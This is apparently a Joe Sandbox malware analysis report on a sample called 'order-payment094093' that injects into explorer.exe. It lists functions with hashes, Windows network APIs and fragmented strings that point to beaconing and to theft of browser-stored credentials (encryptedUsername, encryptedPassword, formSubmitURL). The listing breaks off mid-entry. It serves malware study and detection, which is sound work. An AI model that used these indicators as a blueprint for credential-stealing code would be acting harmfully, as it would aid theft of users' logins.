Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 3210dff805f92ee8ad3e503b66914da50a097756cb4e903531b1941a936f21dc
Instruction ID: 53640f62c498ccb8618ad95ffe44a003ba724559a595f41c9ebb1f66c8594622
Opcode Fuzzy Hash: 3210dff805f92ee8ad3e503b66914da50a097756cb4e903531b1941a936f21dc
Instruction Fuzzy Hash: 00410531B70603ABDB21CE29CC81B6ABBA5FF54710F100619FE5597280DB31E8518BD1

Function 012D2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 012D238D
___swprintf_l.LIBCMT ref: 012D23B3

Strings

]:%u, xrefs: 012D23AA
%%%u, xrefs: 012D2384

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 5550d8cf68afc5ef11f586a295772f604675c340b9d9edc0ea8f64c26b001b29
Instruction ID: 09a5e9c366279e267d30b110e64c65cf747791530b80de2260cd3ad1e94d3d66
Opcode Fuzzy Hash: 5550d8cf68afc5ef11f586a295772f604675c340b9d9edc0ea8f64c26b001b29
Instruction Fuzzy Hash: DF314372A20219DFDB60DF29DC40BAEB7F8EB54610F544555ED49E3244EF309A448BA0

Function 01267D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01267E8B

Strings

-, xrefs: 01267DDD
+, xrefs: 01267DE8

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 5bf33b978ce3a227ad70af083d1dcc32650266b09832bbf73441c8a142182149
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 6D91D470E202079BEB24DF6DE881ABEBBADFF44728F14451AEA55E72C0D77489C08751

Function 01229126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 01229191
@, xrefs: 01229175

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 2bababc836590b36ccd5fd6951a13c324412a471f820fb47c2e9d215be95b938
Instruction ID: c0cef3585181f71a7888bf11d2aa997eec5b0951db07b824c0194a45bf634234
Opcode Fuzzy Hash: 2bababc836590b36ccd5fd6951a13c324412a471f820fb47c2e9d215be95b938
Instruction Fuzzy Hash: 85812971D1127ADBDB259B54CC45BEEB6B8AF48714F0041EAEA09B7280D7709E84CFA0

Function 012ACEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 012ACFBD

Strings

@, xrefs: 012ACF0A
@4Cw@4Cw, xrefs: 012ACFD5, 012ACFDA, 012ACFF1

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Cw@4Cw
API String ID: 4062629308-3101775584
Opcode ID: fd8e5db6eff75fbb516b2bc155d771a81fffda1b352dd691a7b78f78cebf885f
Instruction ID: e6326007c697498a99b7bdf7b44232cb3ced9a238a46d4be32ea954aad6e1a4b
Opcode Fuzzy Hash: fd8e5db6eff75fbb516b2bc155d771a81fffda1b352dd691a7b78f78cebf885f
Instruction Fuzzy Hash: D941AEB5960219DFDB21DFE9C840ABEBBB8FF54B14F00842AEA05EB254D774D901CB61

Analysis Process: explorer.exePID: 4004, Parent PID: 5016COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.4%
Total number of Nodes:	79
Total number of Limit Nodes:	9

Executed Functions

Function 111F9F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 111FA12E
setsockopt.WS2_32 ref: 111FA830
recv.WS2_32 ref: 111FA859

Strings

GET , xrefs: 111FA318
ose, xrefs: 111FA33F
Co, xrefs: 111FA323
&un=, xrefs: 111FA4F1
nnec, xrefs: 111FA32A
dat=, xrefs: 111FA290
&br=, xrefs: 111FA509
&sql, xrefs: 111FA471
tion, xrefs: 111FA331
: cl, xrefs: 111FA338

Memory Dump Source

Source File: 0000000A.00000002.3333395951.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_111e0000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: b87200ccba49175b6efa361b6323045b567d81d2eca7d5787425522868b461a6
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: 1052AB35618A0A8BD719EF68D4847EAF7E1FB54304F50462EC4AFC7142EE34B94ACB81

Function 111F9232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 111F9449

Strings

`, xrefs: 111F941D

Memory Dump Source

Source File: 0000000A.00000002.3333395951.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_111e0000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: 2978bd0c3bc0a6603d565f2c29e39cb8a4e7462b67e95ab997b96d7aee591e7c
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: 41224F70A18A4E9FDB49EF28C4956ADF7E1FB58305F41422EE45ED3250EB30E455CB82

Function 111FAE12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 111FAE67

Memory Dump Source

Source File: 0000000A.00000002.3333395951.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_111e0000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: 33e05c4b7bad879a691092dada64e1bdb85c9cb7783d71dea7c7735b594a733c
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: 1D01B134628B894F8788EF6CE48012AB7E4FBCD318F000B3EE99AC3250EB74C5414B42

Function 111FAE0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 111FAE67

Memory Dump Source

Source File: 0000000A.00000002.3333395951.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_111e0000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: ee2dfe291bbd6d738e8294bad4754ee9d48a6f9408291693a56c7fe0b3863f63
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: 5A01A234628B894B8749EF2C94412A6B7E5FBCE314F000B3EE99AC3241EB25D5024B82

Function 111F48C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 111F49A0

Strings

on.d, xrefs: 111F4902
User-Agent: , xrefs: 111F4935, 111F4948
nt: , xrefs: 111F491E
urlmon.dll, xrefs: 111F4959

Memory Dump Source

Source File: 0000000A.00000002.3333395951.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_111e0000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: b95d02923870b83d73b0c0783e063c06cae25ebfc3ae1949e9aa7f0bc387eb25
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 2A31D431614A0E8FCB05EFA8C8447EDBBE1FB58219F40422AD45ED7240EE789A49C789

Function 111F48BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 111F49A0

Strings

on.d, xrefs: 111F4902
User-Agent: , xrefs: 111F4935, 111F4948
nt: , xrefs: 111F491E
urlmon.dll, xrefs: 111F4959

Memory Dump Source

Source File: 0000000A.00000002.3333395951.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_111e0000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: a294d6dc1287a60e9016b78f9c77fdca432001aecf4517e8758503ecfc7076d7
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 5A21A571A14A4E8BCB05EFA8C8447EDBBF1FF58209F40421AD45AD7250EF749A49C789

Function 111F0B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 111F0CCA

Strings

.dll, xrefs: 111F0BCD
el32, xrefs: 111F0BA0
kern, xrefs: 111F0B99

Memory Dump Source

Source File: 0000000A.00000002.3333395951.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_111e0000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 51ac06a982a4bf6866118c46a8a12150b07249c23d358dcb69f5f310ffba2b2b
Instruction ID: 8ce0128e2971514c5e0a9de49021abd10321bde490d7ccdc48b8ec4e19ac8355
Opcode Fuzzy Hash: 51ac06a982a4bf6866118c46a8a12150b07249c23d358dcb69f5f310ffba2b2b
Instruction Fuzzy Hash: 1C416A74918A0E8FDB44EFA8C8D87ADB7F1FB58304F00417AD84ADB255EE309949CB85

Function 111F0B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 111F0CCA

Strings

.dll, xrefs: 111F0BCD
el32, xrefs: 111F0BA0
kern, xrefs: 111F0B99

Memory Dump Source

Source File: 0000000A.00000002.3333395951.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_111e0000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: 35e80f29edc77f9312fe21dbb30442c4deb0188372c3f0e2e88bd2455c72690b
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: 24414C74918A0A8FDB44EFA8C4D87ADB7F1FB58304F40417AD84EDB255EE309949CB85

Function 111F672E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 111F6791

Strings

conn, xrefs: 111F675A
ect, xrefs: 111F6761

Memory Dump Source

Source File: 0000000A.00000002.3333395951.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_111e0000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 6ceab65733afb0495051f7f16e6ea59f9774eb4de0a265aeb1fb93f06735ce33
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: 17015E30618B1C8FCB84EF1CE088B55B7E0FB58314F1545AEE90DCB226D674D8858BC2

Function 111F6732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 111F6791

Strings

conn, xrefs: 111F675A
ect, xrefs: 111F6761

Memory Dump Source

Source File: 0000000A.00000002.3333395951.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_111e0000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: 100fcb34570bc2aae257205a9a934aa6e79381dda86f70e2ebcc782d90807539
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: 87012C70618A1C8FCB84EF5CE088B55B7E0FB59314F1545AEA80DCB226DA74C9858BC2

Function 111F66B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 111F6713

Strings

send, xrefs: 111F66DA

Memory Dump Source

Source File: 0000000A.00000002.3333395951.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_111e0000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: 84cc77c66751583f22b8b2f08a022c0a9c169cee7e5f0b23520fa4389fae2593
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: 4F012570518A1D8FDBC4EF1CD048B15B7E0FB58314F1646AED85DCB266D670D885CB81

Function 111F65B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 111F6611

Strings

sock, xrefs: 111F65D9

Memory Dump Source

Source File: 0000000A.00000002.3333395951.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_111e0000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: 6c9fba192c8fd33f39b22894fc71ebd84a9f45d05488cb57c90e70d99934a834
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: B1014F70618A1C8FCB84EF1CE048B54BBE0FB59314F1545AEE85ECB266D7B0C985CB86

Function 111EE2DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 111EE32D

Memory Dump Source

Source File: 0000000A.00000002.3333395951.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_111e0000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: 2aa716c37e0376cbc207665988920256d6b91503129af9dde3ab11080929553c
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: CF319C7460AF5ACFDB55DFA9808C295F7A1FB48304F44427EC95DCA206CB30A494CF92

Function 111EE412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 111EE461

Memory Dump Source

Source File: 0000000A.00000002.3333395951.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_111e0000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: 947bac52d5182739cb7bc2355764360def3898fbaf4ded6718cc0f5f2d117545
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: A4F0C234268A4A4FE788EB2CD48562AF7D0FBA8218F41463EA54DC3264DA29D5814756

Non-executed Functions

Function 1006DD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

kern, xrefs: 1006DF5A
user, xrefs: 1006DF03
net., xrefs: 1006DF44
S, xrefs: 1006E073
dll, xrefs: 1006DF4C
.dll, xrefs: 1006DF2F
el32, xrefs: 1006DF27
wini, xrefs: 1006DF72
32.d, xrefs: 1006DF0B
M, xrefs: 1006E082
ll, xrefs: 1006DF13

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: ca2593fe07407ada61d789fc7858fcc807bc6fecfdc7a01d02298a1954cede2b
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: ACE15874618B488FC7A4DF68C8957ABB7E1FF58300F508A2EA59FC7241DF34A5418B89

Function 106DBD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

net., xrefs: 106DBF44
user, xrefs: 106DBF03
.dll, xrefs: 106DBF2F
M, xrefs: 106DC082
wini, xrefs: 106DBF72
el32, xrefs: 106DBF27
ll, xrefs: 106DBF13
kern, xrefs: 106DBF5A
32.d, xrefs: 106DBF0B
S, xrefs: 106DC073
dll, xrefs: 106DBF4C

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 1b673fed1ec8f199e69a6c2dac1b6ac1858450ba9aaa42a614d67bdcbdd3ba45
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 86E15974619B488FC7A4DF68C8857ABB7E1FB58300F504A2EA59FC7245DF30A5428B89

Function 10070792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

dPas, xrefs: 100708E2
d, xrefs: 100708F2
swor, xrefs: 100708EA
name, xrefs: 1007087D
itUR, xrefs: 1007085D
Subm, xrefs: 10070855
encr, xrefs: 1007089D
ypte, xrefs: 100708A5
dUse, xrefs: 100708AD
guid, xrefs: 100707CE
form, xrefs: 1007084D
encr, xrefs: 100708D2
rnam, xrefs: 100708B5
user, xrefs: 10070876
e, xrefs: 100708BD
Fiel, xrefs: 10070884
ypte, xrefs: 100708DA

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 55b87ea25203d67bb4819d0c19886a00051b4f2a8e0d51012aa2211d20c0de78
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 2CB19D34518B488FDB55EF68C485AEEB7F1FF98300F40851EE49AC7252EF74A5098B86

Function 106DE792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

dUse, xrefs: 106DE8AD
encr, xrefs: 106DE8D2
rnam, xrefs: 106DE8B5
Fiel, xrefs: 106DE884
swor, xrefs: 106DE8EA
user, xrefs: 106DE876
Subm, xrefs: 106DE855
form, xrefs: 106DE84D
e, xrefs: 106DE8BD
encr, xrefs: 106DE89D
dPas, xrefs: 106DE8E2
name, xrefs: 106DE87D
itUR, xrefs: 106DE85D
ypte, xrefs: 106DE8A5
ypte, xrefs: 106DE8DA
guid, xrefs: 106DE7CE
d, xrefs: 106DE8F2

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 70deb930aac939657023075043eaf864601ccd442a6f6a98441162400a2899b4
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: A5B19D30519B488EDB94EF68C48AAEEB7F1FF98340F50451EE49AC7251EF70A505CB86

Function 1006E622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

d, xrefs: 1006E67B
2, xrefs: 1006E674
d, xrefs: 1006E6CF
e, xrefs: 1006E66D
i, xrefs: 1006E69E
l, xrefs: 1006E6AC
d, xrefs: 1006E6A5
u, xrefs: 1006E661
w, xrefs: 1006E6B3
s, xrefs: 1006E689
t, xrefs: 1006E6C8
n, xrefs: 1006E6C1
l, xrefs: 1006E6D6
n, xrefs: 1006E6BA
p, xrefs: 1006E690
c, xrefs: 1006E697
l, xrefs: 1006E682

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: 69abc73a4faef75423a71fb439d67bde741e00c6618122e24e4f427ddd4d226f
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: BA419070A18B488FDF14DF88A44A6AD7BE6FB48700F00025EE449D7345DBB5AD458BD6

Function 106DC622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

s, xrefs: 106DC689
p, xrefs: 106DC690
n, xrefs: 106DC6C1
d, xrefs: 106DC6CF
l, xrefs: 106DC6AC
2, xrefs: 106DC674
l, xrefs: 106DC6D6
d, xrefs: 106DC67B
c, xrefs: 106DC697
w, xrefs: 106DC6B3
u, xrefs: 106DC661
l, xrefs: 106DC682
t, xrefs: 106DC6C8
e, xrefs: 106DC66D
n, xrefs: 106DC6BA
d, xrefs: 106DC6A5
i, xrefs: 106DC69E

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: f7a303e5609cd5ef7f205c280893030b08654fccd8742f05f90ddc7ab9998330
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: 4E41AE70B18B0C8FDB54DF88A4466BE7BE2EB88710F00425EE849D3345DBB5AD458BD6

Function 10075AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

n, xrefs: 10075C98
e, xrefs: 10075CA0
D, xrefs: 10075CDA
[, xrefs: 10075CCD
[, xrefs: 10075C2D
l, xrefs: 10075CE2
c, xrefs: 10075C0B
l, xrefs: 10075C35
[, xrefs: 10075C66
b, xrefs: 10075C73
], xrefs: 10075C3D
[, xrefs: 10075BF6
], xrefs: 10075CA8
[, xrefs: 10075C90

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 569580a04a337268ec6151193c366435586c05980309145890387cd218ac8c59
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: B4C15C74218B498FC758EF24C4866EAF3E5FB98304F40861EA59EC7211DF74B615CB8A

Function 106E3AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

[, xrefs: 106E3C90
[, xrefs: 106E3CCD
D, xrefs: 106E3CDA
], xrefs: 106E3C3D
l, xrefs: 106E3C35
c, xrefs: 106E3C0B
l, xrefs: 106E3CE2
n, xrefs: 106E3C98
[, xrefs: 106E3C66
e, xrefs: 106E3CA0
b, xrefs: 106E3C73
[, xrefs: 106E3BF6
], xrefs: 106E3CA8
[, xrefs: 106E3C2D

Memory Dump Source

